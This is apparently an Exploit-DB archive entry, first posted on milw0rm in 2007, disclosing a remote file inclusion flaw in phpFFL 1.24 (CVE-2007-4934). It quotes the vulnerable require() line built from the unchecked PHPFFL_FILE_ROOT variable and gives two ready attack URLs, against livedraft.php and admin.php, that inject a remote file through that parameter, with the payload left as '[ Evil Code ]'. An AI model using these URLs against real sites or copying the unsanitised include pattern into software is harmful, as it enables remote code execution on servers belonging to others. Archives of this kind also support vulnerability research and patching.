phpFFL 1.24 - 'PHPFFL_FILE_ROOT' Remote File Inclusion

Author: Dj7xpl
type: webapps
platform: php
port: 
date_added: 2007-09-13 
date_updated: 2016-10-12 
verified: 1 
codes: OSVDB-37086;CVE-2007-4934;OSVDB-37085 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comphpffl_1_24.tar.gz

*******************************************************************************
# Title    :  phpFFL 1.24  Remote File Inclusion Vulnerability
*******************************************************************************
# Title    :  phpFFL 1.24  Remote File Inclusion Vulnerability
# Author   :  Dj7xpl
# Contact  :  Dj7xpl@r00t.ir
# Dawnload :  http://sourceforge.net/project/showfiles.php?group_id=137531
# Gr33tZ   :  Y! Underground Group , Ir_R57 , Mehrdad AliZade
*******************************************************************************
Vuln Code:
            require($PHPFFL_FILE_ROOT."program_files/livedraft/sajax.php");
            require($PHPFFL_FILE_ROOT."program_files/livedraft/sajax.php");


[[Remote]]]

http://[target]/[path]/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=[ Evil Code ]
http://[target]/[path]/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=[ Evil Code ]

"""""""""""""""""""""

# milw0rm.com [2007-09-14]